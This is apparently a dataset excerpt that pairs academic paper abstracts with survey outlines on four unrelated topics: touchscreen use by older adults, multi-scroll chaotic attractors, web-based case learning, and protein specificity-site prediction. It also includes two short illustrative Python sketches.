valuable information to enhance their interaction with the digital world, as well as, their quality of life. Moreover, it is shown how a pen-like object and a sheet-like one can be used by the elderly to interact with the digital world. --- paper_title: Elderly text-entry performance on touchscreens paper_content: Touchscreen devices have become increasingly popular. Yet they lack of tactile feedback and motor stability, making it difficult effectively typing on virtual keyboards. This is even worse for elderly users and their declining motor abilities, particularly hand tremor. In this paper we examine text-entry performance and typing patterns of elderly users on touch-based devices. Moreover, we analyze users' hand tremor profile and its relationship to typing behavior. Our main goal is to inform future designs of touchscreen keyboards for elderly people. To this end, we asked 15 users to enter text under two device conditions (mobile and tablet) and measured their performance, both speed- and accuracy-wise. 
Additionally, we thoroughly analyze different types of errors (insertions, substitutions, and omissions) looking at touch input features and their main causes. Results show that omissions are the most common error type, mainly due to cognitive errors, followed by substitutions and insertions. While tablet devices can compensate for about 9% of typing errors, omissions are similar across conditions. Measured hand tremor largely correlates with text-entry errors, suggesting that it should be approached to improve input accuracy. Finally, we assess the effect of simple touch models and provide implications to design. --- paper_title: Design and Development of a Mobile Medical Application for the Management of Chronic Diseases: Methods of Improved Data Input for Older People paper_content: The application of already widely available mobile phones would provide medical professionals with an additional possibility of outpatient care, which may reduce medical cost at the same time as providing support to elderly people suffering from chronic diseases, such as diabetes and hypertension. To facilitate this, it is essential to apply user centered development methodologies to counteract opposition due to the technological inexperience of the elderly. In this paper, we describe the design and development of a mobile medical application to help deal with chronic diseases in a home environment. The application is called MyMobileDoc and includes a graphical user interface for patients to enter medical data including blood pressure; blood glucose levels; etc. Although we are aware that sensor devices are being marketed to measure this data, subjective data, for example, pain intensity and contentment level must be manually input. We included 15 patients aged from 36 to 84 (mean age 65) and 4 nurses aged from 20 to 33 (mean age 26) in several of our user centered development cycles. We concentrated on three different possibilities for number input. We demonstrate the function of this interface, its applicability and the importance of patient education. Our aim is to stimulate incidental learning, enhance motivation, increase comprehension and thus acceptance. --- paper_title: A Study on the Icon Feedback Types of Small Touch Screen for the Elderly paper_content: Small touch screens are widely used in applications such as bank ATMs, point-of-sale terminals, ticket vending machines, facsimiles, and home automation in the daily life. It is intuition-oriented and easy to operate. There are a lot of elements that affect the small screen touch performance. One of the essential parts is icon feedback. However, to merely achieve beautiful icon feedback appearance and create interesting interaction experience, many interface designers ignore the real user needs. It is critical for them to trade off the icon feedback type associated with the different users needs in the touch interaction. This is especially important when the user capability is very limited. This paper described a pilot study for identifying factors that determine the icon feedback usability on small touch screen in four older adult Cognitrone groups since current research aimed mostly at general icon guidelines and recommendations and failed to consider and define the specific needs of small touch screen interfaces for the elderly. 
In this paper, we presented a concept from the focus on human necessity and use a cognitive assessment tool, which is the Cognitrone test, to measure older adult's attention and concentration capability and learn more about how to evaluate and design suitable small screen icon feedback types. Forty-five elderly participants participated. Each subject was asked to complete a battery of Cognitrone tests and divided into 4 groups. Each subject was also requested to perform a set of `continuous touch' usability tasks on small touch screen and comment on open-ended questions. Results are discussed with respect to the perceptual and cognitive factors that influence older adults in the use of icon feedback on small touch screen. It showed significant associations between icon feedback performance and factors of attention and concentration. However, this interrelation was much stronger for the Group 2 and Group 4, especially for Type B, Type C and Type G. Moreover, consistent with previous research, older participants were less sensitive and required longer time to adapt to the high-detailed icon feedback. These results are discussed in terms of icon feedback design strategies for interface designers. --- paper_title: Design pattern TRABING: touchscreen-based input technique for people affected by intention tremor paper_content: Tremor patients are frequently facing problems when interacting with IT systems and services. They do not reach the same levels of input efficiency and easily become unhappy with a technology they do not perceive as a general asset. Cases of Intention tremor show a significant comparative rise in inaccurate movement towards a real button or virtual buttons on touch screens, as this particular tremor increases its symptoms when approaching a desired physical target. People suffering from this specific tremor have been identified as the target group. This group has been closely investigated and thus, a new input procedure has been developed which may be used on standard touch screens. The new technique enables users, accordingly tremor patients, to fully operate IT-based systems and therefore possess full control over input. Deviations caused by the tremor are compensated with a continuous movement instead of a single targeted move which remains the most difficult task to the user. Also, the screen surface will present a frictional resistance, which significantly hinders tremor symptoms. Input can be identified by the computer system with high accuracy, by means of special heuristics, which support barrier free access beyond the target group. --- paper_title: Elderly User Evaluation of Mobile Touchscreen Interactions paper_content: Smartphones with touchscreen-based interfaces are increasingly used by non-technical groups including the elderly. However, application developers have little understanding of how senior users interact with their products and of how to design senior-friendly interfaces. As an initial study to assess standard mobile touchscreen interfaces for the elderly, we conducted performance measurements and observational evaluations of 20 elderly participants. The tasks included performing basic gestures such as taps, drags, and pinching motions and using basic interactive components such as software keyboards and photo viewers. We found that mobile touchscreens were generally easy for the elderly to use and a week's experience generally improved their proficiency.
However, careful observations identified several typical problems that should be addressed in future interfaces. We discuss the implications of our experiments, seeking to provide informal guidelines for application developers to design better interfaces for elderly people. ---
Title: Interaction techniques for older adults using touchscreen devices: a literature review Section 1: INTRODUCTION Description 1: Discuss the development of new technologies and their potential benefits for older adults, the usability challenges of traditional input devices, and the aim of this literature review. Section 2: RELATED WORK Description 2: Summarize previous literature reviews and studies concerning touchscreen interaction and older users, highlighting the benefits, challenges, and gaps in current research. Section 3: METHODOLOGY Description 3: Describe the selection criteria for the 24 studies reviewed, including the fields they were sourced from and the focus on touchscreen interaction with older adults. Section 4: Population Description 4: Detail the demographics of the populations studied, including age ranges, previous technology experience, and the types of impairments identified. Section 5: Apparatus Description 5: Provide information on the screen sizes and types of devices used in the studies, as well as their orientation, mounting, and touchscreen technologies. Section 6: Feedback Description 6: Summarize the types of feedback used in the studies, such as visual, audio, and tactile feedback, and their impact on user performance. Section 7: Input techniques Description 7: Discuss the various input techniques evaluated in the studies, including finger versus pen interaction, single touch versus multitouch, and comparisons with other input devices. Section 8: Tasks Description 8: Describe the different types of tasks used in the studies to evaluate touchscreen interaction, categorized into target selection, text or digit input, and gestures of interaction. Section 9: Data collection Description 9: Explain the types of quantitative and qualitative data collected in the studies, including error rates, completion times, subjective questionnaires, and observational data. Section 10: Findings Description 10: Summarize the key findings from the studies, including the effects of various input techniques on older adults' performance, common errors, user preferences, and the impact of feedback. Section 11: Recommendations Description 11: Provide recommendations derived from the studies for designing more ergonomic and user-friendly touchscreen interfaces and interaction techniques for older adults. Section 12: CONCLUSION Description 12: Recap the main insights from the literature review and outline the key parameters to consider when designing touchscreen interaction systems for older adults.
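The text-entry studies referenced for this survey repeatedly report accuracy in terms of insertions, substitutions, and omissions. As an editorial illustration only (not code from any cited paper; the function name, labels, and example strings are assumptions), the following Python sketch shows one common way such a classification can be computed, by aligning the presented and transcribed strings with a minimum-edit-distance alignment and counting each edit operation.

```python
# Illustrative sketch: classify character-level text-entry errors into
# insertions, substitutions, and omissions via a minimum-edit-distance
# (Wagner-Fischer) alignment of the presented and transcribed strings.
def classify_errors(presented: str, transcribed: str) -> dict:
    n, m = len(presented), len(transcribed)
    # dp[i][j] = edit distance between presented[:i] and transcribed[:j]
    dp = [[0] * (m + 1) for _ in range(n + 1)]
    for i in range(n + 1):
        dp[i][0] = i
    for j in range(m + 1):
        dp[0][j] = j
    for i in range(1, n + 1):
        for j in range(1, m + 1):
            cost = 0 if presented[i - 1] == transcribed[j - 1] else 1
            dp[i][j] = min(dp[i - 1][j] + 1,          # omission: target char not typed
                           dp[i][j - 1] + 1,          # insertion: extra char typed
                           dp[i - 1][j - 1] + cost)   # match or substitution
    # Backtrace one optimal alignment and count each error type.
    counts = {"insertions": 0, "substitutions": 0, "omissions": 0}
    i, j = n, m
    while i > 0 or j > 0:
        if i > 0 and j > 0 and dp[i][j] == dp[i - 1][j - 1] + (
                0 if presented[i - 1] == transcribed[j - 1] else 1):
            if presented[i - 1] != transcribed[j - 1]:
                counts["substitutions"] += 1
            i, j = i - 1, j - 1
        elif j > 0 and dp[i][j] == dp[i][j - 1] + 1:
            counts["insertions"] += 1
            j -= 1
        else:
            counts["omissions"] += 1
            i -= 1
    return counts

# Example: "the cat" typed as "teh ct" yields substitutions plus one omission.
print(classify_errors("the cat", "teh ct"))
```

Note that several optimal alignments can exist for the same string pair, so published studies typically fix a tie-breaking rule (as the backtrace above implicitly does) before reporting per-type error counts.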
A brief overview of multi-scroll chaotic attractors generation
6
--- paper_title: DIFFERENTIAL EQUATIONS WITH MULTISPIRAL ATTRACTORS paper_content: A system of nonautonomous differential equations having Chua's piecewise-linearity is studied. A brief discussion about equilibrium points and their stability is given. It is also extended to obtain a system showing "multispiral" strange attractors, and some of the fundamental routes to "multispiral chaos" and bifurcation phenomena are demonstrated with various examples. The same work is done for other systems of autonomous or nonautonomous differential equations. This is achieved by modifying Chua's piecewise-linearity in order to have additional segments. The evolution of the dynamics and a mechanism for the development of multispiral strange attractors are discussed. ---
Title: A Brief Overview of Multi-Scroll Chaotic Attractors Generation Section 1: Introduction Description 1: This section provides an overview of the state of research on multi-scroll chaotic attractors and outlines the structure of the paper. Section 2: Piecewise Linear (PWL) Function Approach Description 2: This section introduces the PWL function approach for generating n-scroll chaotic attractors. Section 3: Switching Manifold Method Description 3: This section explains the switching manifold method for creating multi-scroll chaotic attractors. Section 4: Basic-Circuits Approach Description 4: This section discusses the basic-circuits approach used for generating multi-scroll chaotic attractors. Section 5: Other Techniques for Multi-Scroll Chaotic Attractors Generation Description 5: This section provides a brief overview of several other techniques used to generate multi-scroll chaotic attractors. Section 6: Conclusions Description 6: This section summarizes the main points discussed in the paper and offers some outlook on future research directions.
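The outline above names the piecewise-linear (PWL) function approach as the first family of multi-scroll generation techniques. The sketch below is a purely illustrative example, assuming a generic Chua-like system and the standard double-scroll parameter values rather than the exact equations of the cited reference: the nonlinearity f(x) is an odd-symmetric PWL characteristic, and giving it additional slopes and breakpoints (with suitably retuned parameters) is the basic mechanism by which the PWL approach adds scrolls.

```python
# Minimal sketch (assumed generic form, illustrative parameters only):
#   dx/dt = alpha * (y - x - f(x)),  dy/dt = x - y + z,  dz/dt = -beta * y
# where f(x) is a piecewise-linear characteristic. With the classic two-slope
# f(x) below the system produces the familiar double scroll; extra
# (slope, breakpoint) pairs are how the PWL approach introduces more scrolls.
import numpy as np

def pwl(x, slopes, breakpoints):
    """Odd-symmetric PWL built from |x + b| - |x - b| terms.
    slopes = (m0, m1, ..., mk), breakpoints = (b1, ..., bk) with 0 < b1 < ... < bk."""
    y = slopes[-1] * x
    for i, b in enumerate(breakpoints):
        y += 0.5 * (slopes[i] - slopes[i + 1]) * (abs(x + b) - abs(x - b))
    return y

def chua_rhs(state, alpha, beta, slopes, breakpoints):
    x, y, z = state
    return np.array([alpha * (y - x - pwl(x, slopes, breakpoints)),
                     x - y + z,
                     -beta * y])

def simulate(steps=100_000, dt=1e-3, alpha=9.0, beta=100.0 / 7.0,
             slopes=(-8.0 / 7.0, -5.0 / 7.0), breakpoints=(1.0,)):
    f = lambda s: chua_rhs(s, alpha, beta, slopes, breakpoints)
    state = np.array([0.1, 0.0, 0.0])
    traj = np.empty((steps, 3))
    for k in range(steps):  # fixed-step RK4 integration for simplicity
        k1 = f(state)
        k2 = f(state + 0.5 * dt * k1)
        k3 = f(state + 0.5 * dt * k2)
        k4 = f(state + dt * k3)
        state = state + (dt / 6.0) * (k1 + 2 * k2 + 2 * k3 + k4)
        traj[k] = state
    return traj

trajectory = simulate()  # plotting trajectory[:, 0] vs trajectory[:, 1] reveals the scrolls
```

A fixed-step RK4 integrator is used here only to keep the sketch self-contained; the specific scroll count obtained from an extended PWL characteristic depends on how the additional breakpoints and slopes are tuned.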
Case-Based Learning on Web in Higher Education: A Review of Empirical Research
8
--- paper_title: Case Study as a Constructivist Pedagogy for Teaching Educational Psychology paper_content: Recent interest and inquiry into constructivism, pedagogical content knowledge, and case study methodology are influencing the content and goals of educational psychology in teacher preparation. The reasons seem clear: The content of educational psychology lends itself to authentic, active, and pragmatic applications of theory to school practices, as well as to investigations of a variety of educational issues, perspectives, and contexts which can be viewed through case study, a constructivist problem-based approach to learning. Widely-used educational psychology texts are including constructivism as a cognitive alternative to behaviorist and information processing views of teaching and learning. Concurrently, case studies are being integrated in educational psychology texts, and a myriad of case texts have appeared with application to educational psychology courses. This article considers the decisions, benefits, and difficulties in teaching educational psychology through a constructivist case study approach. --- paper_title: Assessing Complex Problem-Solving Skills and Knowledge Assembly Using Web-Based Hypermedia Design paper_content: This research project studied the effects of hierarchical versus heterarchical hypermedia structures of web-based case representations on complex problem-solving skills and knowledge assembly in problem-centered learning environments to develop a system or model that informs the design of web-based cases for ill-structured problems across multiple disciplines. Two groups of students were assigned to work through an ill-structured problem, represented hierarchically and heterarchically in a web-based format. A web-based tracking program was deployed to track students' journeys through the hypermedia case designs. Students were observed while interacting with the problem and were interviewed after submitting their case solutions. Results from the tracking program, observations, case solutions, and interview questions will address case design issues, problem-solving issues, and group processes. RESEARCH PROBLEM Several research projects and studies (Booth-Sweeney, 2001; Herreid & Schiller, 2001; Siegel, et al., 2000; Rogers & Erickson, 1998; Gerdes, 1998; Sutyak, Lebeau, & O'Donnell, 1998; Fitzgerald & Semrau, 1996; Jacobson, Maouri, Mishra, & Kolar, 1996) have investigated the use of cases or problems in instruction particularly in relation to case structure (e.g., linear vs. hypertext, narrative vs. conceptual) and problem complexity (e.g., well-defined vs. ill-structured), and the impact of such variables on advanced knowledge acquisition. However to date, there is no explicit framework or instructional model to guide the design of web-based hypermedia cases, particularly for ill-structured problems or learning tasks that require students to engage in complex problem-solving and knowledge transfer. In addition, Grissom and Koschmann (1995) contended that cases or problems that are used as a stimulus for authentic activity are hard to come by in disciplines other than medicine, business, and law, and suggested that hypertext/hypermedia may be a more efficient and effective medium to produce cases for learning environments that are problem-centered.
This research project studied the effects of different hypermedia structures of web-based case representations on complex problem-solving skills and knowledge assembly in problem-centered learning environments to develop a system or model that informs the design of web-based cases for ill-structured problems across multiple disciplines. Ill-structured problems are the kinds of problems or tasks that are encountered in everyday practice requiring the integration of several content domains and possessing multiple solutions or solution paths (Jonassen, 1997). They are problems that are "situated in and emergent from a specific context" (Jonassen, 1997, p. 68) and "lacking solutions that are indisputably correct" (Kagan, 1993, p. 715). Therefore they are arguably most appropriate for engaging students in authentic activity and assessing complex problem-solving skills and knowledge transfer. THEORETICAL FRAMEWORK Duffy and Cunningham (1996) identified five strategies for using problems in instruction: (a) the problem as an example; (b) the problem as an integrator or test; (c) the problem as a guide; (d) the problem as a vehicle for process; and (e) the problem as a stimulus for authentic activity. This research project focused on their strategy of using the problem as a stimulus for authentic activity. Authentic activity is most simply defined as the ordinary practices of a culture, namely, coherent, meaningful, and purposeful activities (Brown, Collins, & Duguid, 1989). More specifically, an authentic learning task for students should have the following characteristics. It should: (a) cue the learner to the desired solution(s) in order to promote "free exploration" or self-directed inquiry; (b) allow multiple solutions or solution paths; (c) have no explicit means for determining appropriate action; (d) be perceived as real or consequential by the learner to promote ownership of the problem; and (e) possess multiple criteria for evaluating solutions. … --- paper_title: The Early History of Case-Based Instruction: Insights for Teacher Education Today. paper_content: This examination of early efforts to use the case method of instruction in business and education at Harvard provides historical insights for those currently contemplating the use of cases in the education of teachers. Conceptual clarity about the purpose of case instruction and administrative and financial support for coordinated case writing by faculty are suggested as reasons why the method took hold in business but not in education. --- paper_title: The influence of discussion groups in a case-based learning environment paper_content: The common practice of using discussion groups during case-based learning makes the role of discussion important in these learning environments. However, little empirical research has been done to investigate the influence of discussion on performance and motivation in case-based learning. The purpose of this article is to present the results of a study conducted to examine the role of discussion groups in a case-based environment. College students completed two cases either individually or in small discussion groups. Measures included two case analyses, an attitude survey, time on task, and document analysis. Results revealed significant performance and time differences between instructional methods on the first case, but not on the second case. In addition, results indicated significant differences in student attitudes between treatments.
Overall, participants who worked in groups liked their method significantly better than those who worked alone, felt they learned more working in a group than they would have working alone, and expressed a preference for working in a group if they had to do the class over again. Implications for implementing case-based learning and future research are discussed. --- paper_title: Putting Case-Based Instruction Into Context: Examples From Legal and Medical Education paper_content: Recently, educational theorists have begun to emphasize the importance of situating instruction in meaningful contexts in order to recreate some of the advantages of apprenticeship learning. Cognitive apprenticeship and anchored instruction are two approaches to instruction that provide guidance for teaching in contextualized ways. Cognitive apprenticeship emphasizes the social context of instruction and draws its inspiration from traditional apprenticeships. Anchored instruction provides a model for creating problem contexts that enables students to see the utility of knowledge and to understand the conditions for its use. Together, these two complementary approaches provide a framework for thinking about apprenticeship learning and how it might be transferred to the classroom. Interestingly, authors who have written about cognitive apprenticeships and anchored instruction have made only passing reference to the case method of legal and business education and the problem-based learning approach to medical education, two well-established methods of instruction that are also based on apprenticeship learning and the study of authentic problems or cases. The detailed description of these two approaches to instruction in this article provides a rich source of information about how to create contextualized learning environments in school settings, and demonstrates that case-based instruction can take on different forms and be used in different domains. Each approach is evaluated employing a framework synthesized from cognitive apprenticeship and anchored instruction; the results of this analysis are used to suggest research questions for case-based instruction as it is currently practiced and areas in which further research is needed to refine educational theories. --- paper_title: Using Video-Based Anchored Instruction To Enhance Learning: Taiwan's Experience. paper_content: The purpose of this study is to investigate the effects of computer-assisted videodisc-based anchored instruction on attitudes toward mathematics and instruction as well as problem-solving skills among Taiwanese elementary students. Results from a t-test indicate a significant main effect on student attitudes toward mathematics. Results from a two-way Repeated Measures ANOVA show that students' problem-solving skills improve significantly with anchored instruction. Results also indicate that all the students benefit from the effects of anchored instruction on their problem-solving performance regardless of their mathematics and science abilities. The findings suggest that video-based anchored instruction provides a more motivating environment that enhances students' problem-solving skills. This study is significant because it establishes an example of video-based anchored instruction for Taiwanese students and also provides empirical evidence of its effects on affective and cognitive responses among fifth graders in learning mathematics. This study is helpful to educators who want to help students learn to think and learn through technology.
--- paper_title: Enhancing active learning in microbiology through case based learning: Experiences from an Indian medical school paper_content: Background: Case-based learning (CBL) is an interactive student-centered exploration of real life situations. This paper describes the use of CBL as an educational strategy for promoting active learning in microbiology. Materials and Methods: CBL was introduced in the microbiology curriculum for the second year medical students after an orientation program for faculty and students. After intervention, the average student scores in CBL topics were compared with scores obtained in lecture topics. An attempt was also made to find the effect of CBL on the academic performance. Student and faculty perception on CBL were also recorded. Results: In a cross sectional survey conducted to assess the effectiveness of CBL, students responded that, apart from helping them acquire substantive knowledge in microbiology, CBL sessions enhanced their analytic, collaborative, and communication skills. The block examination scores in CBL topics were significantly higher than those obtained for lecture topics. Faculty rated the process to be highly effective in stimulating student interest and long term retention of microbiology knowledge. The student scores were significantly higher in the group that used CBL, compared to the group that had not used CBL as a learning strategy. Conclusion: Our experience indicated that CBL sessions enhanced active learning in microbiology. More frequent use of CBL sessions would not only help the student gain requisite knowledge in microbiology but also enhance their analytic and communication skills. --- paper_title: Implications For The Design Of Online Case-Based Learning Activities Based On The Student Blended Learning Experience paper_content: An evidence based approach was adopted in the redesign of online learning resources for undergraduates in a professional Veterinary Science degree program. Students used online case based resources in blended learning activities to extend and enhance their understanding of the theories underpinning Veterinary Science and to develop their skills in clinical problem solving. This study investigates what the students thought they were learning through the case studies and how the students engaged with the activities. It then discusses the implications of the students’ experience of the materials for improving the design of the activities. --- paper_title: Multidisciplinary case-based learning for undergraduate students paper_content: This report describes the introduction of case-based learning into the final-year dental programme at the Dublin Dental School. Students attended a series of one-hour sessions in groups of 8. Each group appointed a chairman for each session and a tutor facilitated the discussion. Case details were provided during the session with relevant diagnostic records. At weekly discussion sessions, the group findings and treatment options were considered. The diagnosis and treatment plans were then discussed by clinicians involved in the treatment of the case. Following the last session, the case-based learning programme was evaluated by means of a questionnaire distributed to both tutors and students. Both students and tutors rated the sessions positively. Case-based learning was found to be a worthwhile progression from problem-based learning. 
--- paper_title: Improving User Satisfaction via a Case-Enhanced E-Learning Environment paper_content: Purpose – The purpose of this paper is to examine students’ experiences with a case‐enhanced e‐learning environment in a higher‐education institute.Design/methodology/approach – In total, 67 graduate students volunteered to take part in this experiment. The participants were assigned to treatment groups using tutorial with case‐based learning (CBL) module or comparison groups using tutorial only. They completed a background survey, a technological proficiency survey, a pre‐ and post‐knowledge test, and a learner perception survey of the e‐learning environment.Findings – The present study found a significant increase in the level of domain knowledge in both a tutorial‐only group and a tutorial with CBL module group. The tutorial with CBL group scored significantly higher on learners’ perceptions of the e‐learning environment in terms of ease of use, satisfaction, and usefulness. In addition, the results of the use of a CBL module based on individual differences such as gender, degree level, and information... ---
Title: Case-Based Learning on Web in Higher Education: A Review of Empirical Research
Section 1: Introduction
Description 1: Introduce the topic of case-based learning on the web in higher education, its rationale, and the purpose of the review.
Section 2: Case-Based Learning on Web
Description 2: Define case-based learning and discuss its benefits and characteristics, especially when implemented on the web.
Section 3: Method
Description 3: Describe the methodology used for the review, including the guidelines followed, the unit of analysis, and the coding scheme.
Section 4: Sources of Data
Description 4: Outline the data sources, including the stages of search, types of articles reviewed, and the databases used.
Section 5: Findings
Description 5: Summarize the main findings from the reviewed articles, grouped into case-based learning on web usage profile and effects on performance and affective outcomes.
Section 6: Case-Based Learning on Web Usage Profile
Description 6: Describe the disciplines where CBL on web is used and how students and instructors utilize it.
Section 7: Effects of Case-Based Learning on Web
Description 7: Discuss the effects of CBL on performance outcomes and affective outcomes, including attitudes and satisfaction.
Section 8: Conclusion
Description 8: Summarize the limitations of previous studies, implications for practice, and suggest directions for future research on CBL on web in higher education.
A survey on prediction of specificity-determining sites in proteins
10
--- paper_title: In silico discovery of enzyme-substrate specificity-determining residue clusters. paper_content: The binding between an enzyme and its substrate is highly specific, despite the fact that many different enzymes show significant sequence and structure similarity. There must be, then, substrate specificity-determining residues that enable different enzymes to recognize their unique substrates. We reason that a coordinated, not independent, action of both conserved and non-conserved residues determine enzymatic activity and specificity. Here, we present a surface patch ranking (SPR) method for in silico discovery of substrate specificity-determining residue clusters by exploring both sequence conservation and correlated mutations. As case studies we apply SPR to several highly homologous enzymatic protein pairs, such as guanylyl versus adenylyl cyclases, lactate versus malate dehydrogenases, and trypsin versus chymotrypsin. Without using experimental data, we predict several single and multi-residue clusters that are consistent with previous mutagenesis experimental results. Most single-residue clusters are directly involved in enzyme–substrate interactions, whereas multi-residue clusters are vital for domain–domain and regulator–enzyme interactions, indicating their complementary role in specificity determination. These results demonstrate that SPR may help the selection of target residues for mutagenesis experiments and, thus, focus rational drug design, protein engineering, and functional annotation to the relevant regions of a protein. --- paper_title: High Resolution Crystal Structures of Human Rab5a and Five Mutants with Substitutions in the Catalytically Important Phosphate-Binding Loop paper_content: Abstract GTPase domain crystal structures of Rab5a wild type and five variants with mutations in the phosphate-binding loop are reported here at resolutions up to 1.5 A. Of particular interest, the A30P mutant was crystallized in complexes with GDP, GDP+AlF3, and authentic GTP, respectively. The other variant crystals were obtained in complexes with a non-hydrolyzable GTP analog, GppNHp. All structures were solved in the same crystal form, providing an unusual opportunity to compare structures of small GTPases with different catalytic rates. The A30P mutant exhibits dramatically reduced GTPase activity and forms a GTP-bound complex stable enough for crystallographic analysis. Importantly, the A30P structure with bound GDP plus AlF3has been solved in the absence of a GTPase-activating protein, and it may resemble that of a transition state intermediate. Conformational changes are observed between the GTP-bound form and the transition state intermediate, mainly in the switch II region containing the catalytic Gln79 residue and independent of A30P mutation-induced local alterations in the P-loop. The structures suggest an important catalytic role for a P-loop backbone amide group, which is eliminated in the A30P mutant, and support the notion that the transition state of GTPase-mediated GTP hydrolysis is of considerable dissociative character. --- paper_title: Prediction of functional specificity determinants from protein sequences using log-likelihood ratios paper_content: Motivation: A number of methods have been developed to predict functional specificity determinants in protein families based on sequence information. Most of these methods rely on pre-defined functional subgroups. 
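As a concrete baseline for the conservation signal that the specificity-prediction entries in this list build on, the following minimal sketch scores each alignment column by its Shannon entropy. It is an illustration only, not code from any of the cited tools; the toy alignment is invented.

import math
from collections import Counter

def column_entropy(column):
    """Shannon entropy (in bits) of the residue distribution in one alignment column."""
    counts = Counter(r for r in column if r != "-")  # ignore gap characters
    total = sum(counts.values())
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

# Toy alignment: rows are aligned sequences, columns are alignment positions.
alignment = ["ACDKL", "ACEKL", "ACDRL", "GCEKL"]
for i, col in enumerate(zip(*alignment)):
    print(f"position {i}: entropy = {column_entropy(col):.2f} bits")

Specificity-determining-site methods refine this baseline by contrasting the distributions of predefined or automatically derived subfamilies rather than scoring overall conservation.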
Manual subgroup definition is difficult because of the limited number of experimentally characterized subfamilies with differing specificity, while automatic subgroup partitioning using computational tools is a non-trivial task and does not always yield ideal results. ::: ::: Results: We propose a new approach SPEL (specificity positions by evolutionary likelihood) to detect positions that are likely to be functional specificity determinants. SPEL, which does not require subgroup definition, takes a multiple sequence alignment of a protein family as the only input, and assigns a P-value to every position in the alignment. Positions with low P-values are likely to be important for functional specificity. An evolutionary tree is reconstructed during the calculation, and P-value estimation is based on a random model that involves evolutionary simulations. Evolutionary log-likelihood is chosen as a measure of amino acid distribution at a position. To illustrate the performance of the method, we carried out a detailed analysis of two protein families (LacI/PurR and G protein α subunit), and compared our method with two existing methods (evolutionary trace and mutual information based). All three methods were also compared on a set of protein families with known ligand-bound structures. ::: ::: Availability: SPEL is freely available for non-commercial use. Its pre-compiled versions for several platforms and alignments used in this work are available at ftp://iole.swmed.edu/pub/SPEL/ ::: ::: Contact:[email protected]. ::: ::: Supplementary information: Supplementary materials are available at ftp:/iole.swmed.edu/pub/SPEL/ --- paper_title: SPEER-SERVER: a web server for prediction of protein specificity determining sites paper_content: Sites that show specific conservation patterns within subsets of proteins in a protein family are likely to be involved in the development of functional specificity. These sites, generally termed specificity determining sites (SDS), might play a crucial role in binding to a specific substrate or proteins. Identification of SDS through experimental techniques is a slow, difficult and tedious job. Hence, it is very important to develop efficient computational methods that can more expediently identify SDS. Herein, we present Specificity prediction using amino acids’ Properties, Entropy and Evolution Rate (SPEER)-SERVER, a web server that predicts SDS by analyzing quantitative measures of the conservation patterns of protein sites based on their physico-chemical properties and the heterogeneity of evolutionary changes between and within the protein subfamilies. This web server provides an improved representation of results, adds useful input and output options and integrates a wide range of analysis and data visualization tools when compared with the original standalone version of the SPEER algorithm. Extensive benchmarking finds that SPEER-SERVER exhibits sensitivity and precision performance that, on average, meets or exceeds that of other currently available methods. SPEER-SERVER is available at http://www.hpppi.iicb.res.in/ss/. --- paper_title: The Rab GTPase family paper_content: SUMMARY ::: The Rab family is part of the Ras superfamily of small GTPases. There are at least 60 Rab genes in the human genome, and a number of Rab GTPases are conserved from yeast to humans. The different Rab GTPases are localized to the cytosolic face of specific intracellular membranes, where they function as regulators of distinct steps in membrane traffic pathways. 
In the GTP-bound form, the Rab GTPases recruit specific sets of effector proteins onto membranes. Through their effectors, Rab GTPases regulate vesicle formation, actin- and tubulin-dependent vesicle movement, and membrane fusion. --- paper_title: Using evolutionary information to find specificity-determining and co-evolving residues. paper_content: Intricate networks of protein interactions rely on the ability of a protein to recognize its targets: other proteins, ligands, and sites on DNA and RNA. To recognize other molecules, it was suggested that a protein uses a small set of specificity-determining residues (SDRs). How can one find these residues in proteins and distinguish them from other functionally important amino acids? A number of bioinformatics methods to predict SDRs have been developed in recent years. These methods use genomic information and multiple sequence alignments to identify positions exhibiting a specific pattern of conservation and variability. The challenge is to delineate the evolutionary pattern of SDRs from that of the active site residues and the residues responsible for formation of the protein's structure. The phylogenetic history of a protein family makes such analysis particularly hard. Here we present two methods for finding the SDRs and the co-evolving residues (CERs) in proteins. We use a Monte Carlo approach for statistical inference, allowing us to reveal specific evolutionary patterns of SDRs and CERs. We apply these methods to study specific recognition in the bacterial two-component system and in the class Ia aminoacyl-tRNA synthetases. Our results agree well with structural information and the experimental analyses of these systems. Our results point at the complex and distinct patterns characteristic of the evolution of specificity in these systems. --- paper_title: An evolutionary trace method defines binding surfaces common to protein families paper_content: X-ray or NMR structures of proteins are often derived without their ligands, and even when the structure of a full complex is available, the area of contact that is functionally and energetically significant may be a specialized subset of the geometric interface deduced from the spatial proximity between ligands. Thus, even after a structure is solved, it remains a major theoretical and experimental goal to localize protein functional interfaces and understand the role of their constituent residues. The evolutionary trace method is a systematic, transparent and novel predictive technique that identifies active sites and functional interfaces in proteins with known structure. It is based on the extraction of functionally important residues from sequence conservation patterns in homologous proteins, and on their mapping onto the protein surface to generate clusters identifying functional interfaces. The SH2 and SH3 modular signaling domains and the DNA binding domain of the nuclear hormone receptors provide tests for the accuracy and validity of our method. In each case, the evolutionary trace delineates the functional epitope and identifies residues critical to binding specificity. Based on mutational evolutionary analysis and on the structural homology of protein families, this simple and versatile approach should help focus site-directed mutagenesis studies of structure-function relationships in macromolecules, as well as studies of specificity in molecular recognition. 
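The co-evolution signal mentioned in the entry above on specificity-determining and co-evolving residues is usually quantified with a pairwise association measure such as mutual information between alignment columns. The sketch below computes that raw measure on invented toy columns; it is not the cited Monte Carlo procedure, which additionally corrects for shared phylogeny.

import math
from collections import Counter

def mutual_information(col_i, col_j):
    """Mutual information (bits) between the residue distributions of two columns."""
    n = len(col_i)
    pairs = Counter(zip(col_i, col_j))
    fi, fj = Counter(col_i), Counter(col_j)
    return sum((c / n) * math.log2((c / n) / ((fi[a] / n) * (fj[b] / n)))
               for (a, b), c in pairs.items())

col_a = "KKRRKKRR"  # toy column: substitutions split the family in two
col_b = "DDEEDDEE"  # toy column whose substitutions track col_a -> high MI
col_c = "AAAAAAAA"  # invariant toy column -> zero MI
print("MI(a, b) =", round(mutual_information(col_a, col_b), 3))
print("MI(a, c) =", round(mutual_information(col_a, col_c), 3))

High raw mutual information can reflect common ancestry rather than functional coupling, which is why the bootstrap- and tree-aware corrections described elsewhere in this list are needed.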
